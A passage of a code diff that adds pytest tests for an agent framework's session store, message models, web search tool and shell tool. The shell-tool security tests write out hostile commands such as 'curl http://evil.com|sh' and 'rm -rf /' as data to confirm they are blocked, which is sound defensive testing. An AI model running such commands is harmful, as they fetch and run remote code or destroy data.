sessions = await manager.list_sessions()
assert len(sessions) == 2
@pytest.mark.asyncio
async def test_list_sessions_by_agent(self, manager):
await manager.create_session(agent_name="agent1")
await manager.create_session(agent_name="agent2")
await manager.create_session(agent_name="agent1")
sessions = await manager.list_sessions(agent_name="agent1")
assert len(sessions) == 2
assert all(s.agent_name == "agent1" for s in sessions)
class TestSessionManagerHealth:
@pytest.mark.asyncio
async def test_health_check(self, manager):
assert await manager.health_check() is True

View File

@ -0,0 +1,146 @@
"""Tests for Session and Message data models."""
import pytest
from agentkit.session.models import Message, MessageRole, Session, SessionStatus
class TestSessionStatus:
def test_status_values(self):
assert SessionStatus.ACTIVE == "active"
assert SessionStatus.PAUSED == "paused"
assert SessionStatus.CLOSED == "closed"
def test_status_from_string(self):
assert SessionStatus("active") == SessionStatus.ACTIVE
assert SessionStatus("paused") == SessionStatus.PAUSED
assert SessionStatus("closed") == SessionStatus.CLOSED
class TestMessageRole:
def test_role_values(self):
assert MessageRole.SYSTEM == "system"
assert MessageRole.USER == "user"
assert MessageRole.ASSISTANT == "assistant"
assert MessageRole.TOOL == "tool"
class TestSession:
def test_create_session(self):
session = Session(session_id="s1", agent_name="test-agent")
assert session.session_id == "s1"
assert session.agent_name == "test-agent"
assert session.status == SessionStatus.ACTIVE
assert session.metadata == {}
assert session.created_at is not None
assert session.updated_at is not None
def test_session_to_dict_and_back(self):
session = Session(
session_id="s1",
agent_name="agent1",
status=SessionStatus.PAUSED,
metadata={"key": "value"},
)
d = session.to_dict()
assert d["session_id"] == "s1"
assert d["agent_name"] == "agent1"
assert d["status"] == "paused"
assert d["metadata"] == {"key": "value"}
restored = Session.from_dict(d)
assert restored.session_id == session.session_id
assert restored.agent_name == session.agent_name
assert restored.status == session.status
assert restored.metadata == session.metadata
def test_new_session_id_is_unique(self):
ids = {Session.new_session_id() for _ in range(100)}
assert len(ids) == 100
def test_new_message_id_is_unique(self):
ids = {Session.new_message_id() for _ in range(100)}
assert len(ids) == 100
class TestMessage:
def test_create_message(self):
msg = Message(
message_id="m1",
session_id="s1",
role=MessageRole.USER,
content="Hello",
)
assert msg.message_id == "m1"
assert msg.session_id == "s1"
assert msg.role == MessageRole.USER
assert msg.content == "Hello"
assert msg.tool_call_id is None
assert msg.agent_name is None
assert msg.metadata == {}
def test_message_with_tool_call(self):
msg = Message(
message_id="m1",
session_id="s1",
role=MessageRole.TOOL,
content="result",
tool_call_id="tc1",
agent_name="agent1",
)
assert msg.tool_call_id == "tc1"
assert msg.agent_name == "agent1"
def test_message_to_dict_and_back(self):
msg = Message(
message_id="m1",
session_id="s1",
role=MessageRole.ASSISTANT,
content="Hi there",
tool_call_id="tc1",
agent_name="agent1",
metadata={"step": 1},
)
d = msg.to_dict()
assert d["message_id"] == "m1"
assert d["role"] == "assistant"
assert d["tool_call_id"] == "tc1"
restored = Message.from_dict(d)
assert restored.message_id == msg.message_id
assert restored.role == msg.role
assert restored.content == msg.content
assert restored.tool_call_id == msg.tool_call_id
assert restored.agent_name == msg.agent_name
assert restored.metadata == msg.metadata
def test_to_chat_message_user(self):
msg = Message(
message_id="m1",
session_id="s1",
role=MessageRole.USER,
content="Hello",
)
chat_msg = msg.to_chat_message()
assert chat_msg == {"role": "user", "content": "Hello"}
def test_to_chat_message_tool(self):
msg = Message(
message_id="m1",
session_id="s1",
role=MessageRole.TOOL,
content="result",
tool_call_id="tc1",
)
chat_msg = msg.to_chat_message()
assert chat_msg == {"role": "tool", "content": "result", "tool_call_id": "tc1"}
def test_to_chat_message_no_tool_call_id(self):
msg = Message(
message_id="m1",
session_id="s1",
role=MessageRole.ASSISTANT,
content="Hi",
)
chat_msg = msg.to_chat_message()
assert "tool_call_id" not in chat_msg

View File

@ -0,0 +1,157 @@
"""Tests for InMemorySessionStore."""
import pytest
from agentkit.session.models import Message, MessageRole, Session, SessionStatus
from agentkit.session.store import InMemorySessionStore
@pytest.fixture
def store():
return InMemorySessionStore()
async def _create_session(store, session_id="s1", agent_name="agent1"):
session = Session(session_id=session_id, agent_name=agent_name)
await store.save_session(session)
return session
async def _create_message(store, session_id, role=MessageRole.USER, content="Hello"):
msg = Message(
message_id=Session.new_message_id(),
session_id=session_id,
role=role,
content=content,
)
await store.append_message(msg)
return msg
class TestInMemorySessionStoreCRUD:
@pytest.mark.asyncio
async def test_save_and_get(self, store):
session = await _create_session(store)
fetched = await store.get_session("s1")
assert fetched is not None
assert fetched.session_id == "s1"
@pytest.mark.asyncio
async def test_get_nonexistent(self, store):
result = await store.get_session("nonexistent")
assert result is None
@pytest.mark.asyncio
async def test_update_status(self, store):
await _create_session(store)
updated = await store.update_session_status("s1", SessionStatus.PAUSED)
assert updated is not None
assert updated.status == SessionStatus.PAUSED
@pytest.mark.asyncio
async def test_update_status_nonexistent(self, store):
result = await store.update_session_status("nonexistent", SessionStatus.PAUSED)
assert result is None
@pytest.mark.asyncio
async def test_delete(self, store):
await _create_session(store)
assert await store.delete_session("s1") is True
assert await store.get_session("s1") is None
@pytest.mark.asyncio
async def test_delete_nonexistent(self, store):
assert await store.delete_session("nonexistent") is False
@pytest.mark.asyncio
async def test_list_sessions(self, store):
await _create_session(store, "s1", "agent1")
await _create_session(store, "s2", "agent2")
sessions = await store.list_sessions()
assert len(sessions) == 2
@pytest.mark.asyncio
async def test_list_sessions_by_agent(self, store):
await _create_session(store, "s1", "agent1")
await _create_session(store, "s2", "agent2")
sessions = await store.list_sessions(agent_name="agent1")
assert len(sessions) == 1
assert sessions[0].agent_name == "agent1"
class TestInMemorySessionStoreMessages:
@pytest.mark.asyncio
async def test_append_and_get(self, store):
await _create_session(store)
await _create_message(store, "s1", content="Hello")
await _create_message(store, "s1", content="World")
messages = await store.get_messages("s1")
assert len(messages) == 2
assert messages[0].content == "Hello"
assert messages[1].content == "World"
@pytest.mark.asyncio
async def test_get_messages_pagination(self, store):
await _create_session(store)
for i in range(5):
await _create_message(store, "s1", content=f"Msg {i}")
page = await store.get_messages("s1", limit=2, offset=1)
assert len(page) == 2
assert page[0].content == "Msg 1"
assert page[1].content == "Msg 2"
@pytest.mark.asyncio
async def test_count_messages(self, store):
await _create_session(store)
await _create_message(store, "s1")
await _create_message(store, "s1")
assert await store.count_messages("s1") == 2
@pytest.mark.asyncio
async def test_count_messages_empty_session(self, store):
assert await store.count_messages("nonexistent") == 0
@pytest.mark.asyncio
async def test_get_messages_empty_session(self, store):
messages = await store.get_messages("nonexistent")
assert messages == []
@pytest.mark.asyncio
async def test_delete_session_removes_messages(self, store):
await _create_session(store)
await _create_message(store, "s1")
await store.delete_session("s1")
assert await store.count_messages("s1") == 0
class TestInMemorySessionStoreEviction:
@pytest.mark.asyncio
async def test_evict_closed_session_on_full(self):
store = InMemorySessionStore(max_sessions=2)
s1 = await _create_session(store, "s1")
await _create_session(store, "s2")
# Close s1 so it can be evicted
await store.update_session_status("s1", SessionStatus.CLOSED)
# Creating a third session should evict s1
await _create_session(store, "s3")
assert await store.get_session("s1") is None
assert await store.get_session("s2") is not None
assert await store.get_session("s3") is not None
@pytest.mark.asyncio
async def test_full_no_closed_raises(self):
store = InMemorySessionStore(max_sessions=2)
await _create_session(store, "s1")
await _create_session(store, "s2")
with pytest.raises(RuntimeError, match="full"):
await _create_session(store, "s3")
class TestInMemorySessionStoreHealth:
@pytest.mark.asyncio
async def test_health_check(self, store):
assert await store.health_check() is True

View File

@ -0,0 +1,155 @@
"""Unit tests for ShellTool — command execution with safety controls."""
import asyncio
import pytest
from agentkit.tools.shell import ShellTool, DEFAULT_ALLOWED_COMMANDS, BLOCKED_PATTERNS
class TestShellToolSchema:
"""Test schema definitions."""
def test_input_schema_has_required_fields(self):
tool = ShellTool()
schema = tool.input_schema
assert "command" in schema["properties"]
assert "command" in schema["required"]
assert "timeout" in schema["properties"]
assert "working_dir" in schema["properties"]
def test_output_schema_has_required_fields(self):
tool = ShellTool()
schema = tool.output_schema
assert "stdout" in schema["properties"]
assert "stderr" in schema["properties"]
assert "exit_code" in schema["properties"]
assert "success" in schema["properties"]
class TestShellToolSecurity:
"""Test command allowlist and blocking."""
def test_allowed_command_echo(self):
tool = ShellTool()
allowed, _ = tool._is_command_allowed("echo hello")
assert allowed is True
def test_allowed_command_ls(self):
tool = ShellTool()
allowed, _ = tool._is_command_allowed("ls -la")
assert allowed is True
def test_allowed_command_git_status(self):
tool = ShellTool()
allowed, _ = tool._is_command_allowed("git status")
assert allowed is True
def test_blocked_command_rm(self):
tool = ShellTool()
allowed, reason = tool._is_command_allowed("rm -rf /tmp/test")
assert allowed is False
# rm -rf /tmp/test matches "rm -rf /" pattern
assert "Blocked dangerous" in reason or "not in allowed" in reason
def test_blocked_dangerous_pattern(self):
tool = ShellTool()
allowed, reason = tool._is_command_allowed("rm -rf /")
assert allowed is False
assert "Blocked dangerous" in reason
def test_blocked_curl_pipe_sh(self):
tool = ShellTool()
allowed, reason = tool._is_command_allowed("curl http://evil.com|sh")
assert allowed is False
def test_allow_all_mode(self):
tool = ShellTool(allow_all=True)
# allow_all allows non-dangerous commands outside default whitelist
allowed, _ = tool._is_command_allowed("my-custom-app --run")
assert allowed is True
def test_custom_allowed_commands(self):
tool = ShellTool(allowed_commands=["echo", "myapp"])
allowed, _ = tool._is_command_allowed("myapp --run")
assert allowed is True
allowed2, _ = tool._is_command_allowed("ls")
assert allowed2 is False
def test_empty_command_rejected(self):
tool = ShellTool()
allowed, reason = tool._is_command_allowed("")
assert allowed is False
def test_invalid_shell_syntax_rejected(self):
tool = ShellTool()
allowed, reason = tool._is_command_allowed("echo 'unclosed")
assert allowed is False
class TestShellToolExecution:
"""Test actual command execution."""
@pytest.mark.asyncio
async def test_echo_command(self):
tool = ShellTool()
result = await tool.execute(command="echo hello world")
assert result["success"] is True
assert "hello world" in result["stdout"]
assert result["exit_code"] == 0
@pytest.mark.asyncio
async def test_pwd_command(self):
tool = ShellTool()
result = await tool.execute(command="pwd")
assert result["success"] is True
assert result["exit_code"] == 0
@pytest.mark.asyncio
async def test_failing_command(self):
tool = ShellTool(allowed_commands=["ls"])
result = await tool.execute(command="ls /nonexistent_dir_xyz_12345")
assert result["success"] is False
assert result["exit_code"] != 0
@pytest.mark.asyncio
async def test_command_timeout(self):
tool = ShellTool(allowed_commands=["sleep"], default_timeout=1)
result = await tool.execute(command="sleep 10", timeout=1)
assert result["success"] is False
assert result["timed_out"] is True
@pytest.mark.asyncio
async def test_missing_command_param(self):
tool = ShellTool()
result = await tool.execute()
assert result["success"] is False
assert "command" in result["error"]
@pytest.mark.asyncio
async def test_blocked_command_returns_error(self):
tool = ShellTool()
result = await tool.execute(command="rm -rf /tmp/test")
assert result["success"] is False
assert "not allowed" in result["error"]
@pytest.mark.asyncio
async def test_working_dir(self):
tool = ShellTool(working_dir="/tmp")
result = await tool.execute(command="pwd")
assert result["success"] is True
assert "/tmp" in result["stdout"]
@pytest.mark.asyncio
async def test_output_truncation(self):
tool = ShellTool(max_output_length=50, allowed_commands=["python3"])
# Generate long output
result = await tool.execute(command="python3 -c \"print('x' * 1000)\"")
assert result["success"] is True
assert len(result["stdout"]) < 200 # Truncated + message
assert "truncated" in result.get("stdout", "") or result.get("truncated") is True
@pytest.mark.asyncio
async def test_stderr_captured(self):
tool = ShellTool(allowed_commands=["python3"])
result = await tool.execute(command="python3 -c \"import sys; print('error', file=sys.stderr)\"")
assert "error" in result["stderr"]

View File

@ -0,0 +1,172 @@
"""Unit tests for WebSearchTool — multi-backend web search."""
import pytest
from unittest.mock import AsyncMock, patch, MagicMock
from agentkit.tools.web_search import WebSearchTool
class TestWebSearchToolSchema:
"""Test schema definitions."""
def test_input_schema_has_required_fields(self):
tool = WebSearchTool()
schema = tool.input_schema
assert "query" in schema["properties"]
assert "query" in schema["required"]
assert "max_results" in schema["properties"]
def test_output_schema_has_required_fields(self):
tool = WebSearchTool()
schema = tool.output_schema
assert "results" in schema["properties"]
assert "total" in schema["properties"]
"backend" in schema["properties"]
assert "success" in schema["properties"]
class TestWebSearchToolValidation:
"""Test input validation."""
@pytest.mark.asyncio
async def test_missing_query(self):
tool = WebSearchTool()
result = await tool.execute()
assert result["success"] is False
assert "query" in result["error"]
@pytest.mark.asyncio
async def test_empty_query(self):
tool = WebSearchTool()
result = await tool.execute(query="")
assert result["success"] is False
class TestWebSearchToolDuckDuckGo:
"""Test DuckDuckGo fallback parsing."""
def test_parse_html_with_results(self):
html = """
<html><body>
<a class="result-link" href="https://example.com/result1">Result 1 Title</a>
<td class="result-snippet">Snippet for result 1</td>
<a class="result-link" href="https://example.com/result2">Result 2 Title</a>
<td class="result-snippet">Snippet for result 2</td>
</body></html>
"""
results = WebSearchTool._parse_duckduckgo_html(html, 5)
assert len(results) == 2
assert results[0]["title"] == "Result 1 Title"
assert results[0]["url"] == "https://example.com/result1"
assert results[0]["snippet"] == "Snippet for result 1"
def test_parse_html_empty(self):
results = WebSearchTool._parse_duckduckgo_html("<html></html>", 5)
assert results == []
def test_parse_html_skips_duckduckgo_links(self):
html = """
<a class="result-link" href="https://duckduckgo.com/internal">Internal</a>
<a class="result-link" href="https://example.com/good">Good Result</a>
<td class="result-snippet">Good snippet</td>
"""
results = WebSearchTool._parse_duckduckgo_html(html, 5)
assert len(results) == 1
assert results[0]["url"] == "https://example.com/good"
def test_parse_html_max_results(self):
html = ""
for i in range(10):
html += f'<a class="result-link" href="https://example.com/{i}">Title {i}</a>\n'
html += f'<td class="result-snippet">Snippet {i}</td>\n'
results = WebSearchTool._parse_duckduckgo_html(html, 3)
assert len(results) == 3
class TestWebSearchToolTavily:
"""Test Tavily API backend."""
@pytest.mark.asyncio
async def test_tavily_success(self):
tool = WebSearchTool(tavily_api_key="test-key")
mock_response = MagicMock()
mock_response.json.return_value = {
"results": [
{"title": "Test", "url": "https://example.com", "content": "Test content"},
]
}
mock_response.raise_for_status = MagicMock()
with patch("httpx.AsyncClient") as mock_client_cls:
mock_client = AsyncMock()
mock_client.post = AsyncMock(return_value=mock_response)
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
mock_client.__aexit__ = AsyncMock(return_value=None)
mock_client_cls.return_value = mock_client
result = await tool.execute(query="test query")
assert result["success"] is True
assert result["backend"] == "tavily"
assert len(result["results"]) == 1
@pytest.mark.asyncio
async def test_tavily_failure_falls_back(self):
tool = WebSearchTool(tavily_api_key="test-key")
with patch.object(tool, "_search_tavily", return_value={"success": False, "error": "API error", "results": [], "total": 0}):
with patch.object(tool, "_search_duckduckgo", return_value={"results": [], "total": 0, "backend": "duckduckgo", "success": True}):
result = await tool.execute(query="test")
assert result["backend"] == "duckduckgo"
class TestWebSearchToolSerper:
"""Test Serper API backend."""
@pytest.mark.asyncio
async def test_serper_success(self):
tool = WebSearchTool(serper_api_key="test-key")
mock_response = MagicMock()
mock_response.json.return_value = {
"organic": [
{"title": "Test", "link": "https://example.com", "snippet": "Test snippet"},
]
}
mock_response.raise_for_status = MagicMock()
with patch("httpx.AsyncClient") as mock_client_cls:
mock_client = AsyncMock()
mock_client.post = AsyncMock(return_value=mock_response)
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
mock_client.__aexit__ = AsyncMock(return_value=None)
mock_client_cls.return_value = mock_client
result = await tool.execute(query="test query")
assert result["success"] is True
assert result["backend"] == "serper"
assert len(result["results"]) == 1
class TestWebSearchToolPriority:
"""Test backend priority and fallback chain."""
@pytest.mark.asyncio
async def test_tavily_over_serper(self):
"""Tavily should be tried before Serper when both keys are available."""
tool = WebSearchTool(tavily_api_key="t-key", serper_api_key="s-key")
with patch.object(tool, "_search_tavily", return_value={"results": [], "total": 0, "backend": "tavily", "success": True}) as mock_tavily:
result = await tool.execute(query="test")
mock_tavily.assert_called_once()
assert result["backend"] == "tavily"
@pytest.mark.asyncio
async def test_no_keys_uses_duckduckgo(self):
"""Without API keys, DuckDuckGo is used directly."""
tool = WebSearchTool()
with patch.object(tool, "_search_duckduckgo", return_value={"results": [], "total": 0, "backend": "duckduckgo", "success": True}) as mock_ddg:
result = await tool.execute(query="test")
mock_ddg.assert_called_once()
assert result["backend"] == "duckduckgo"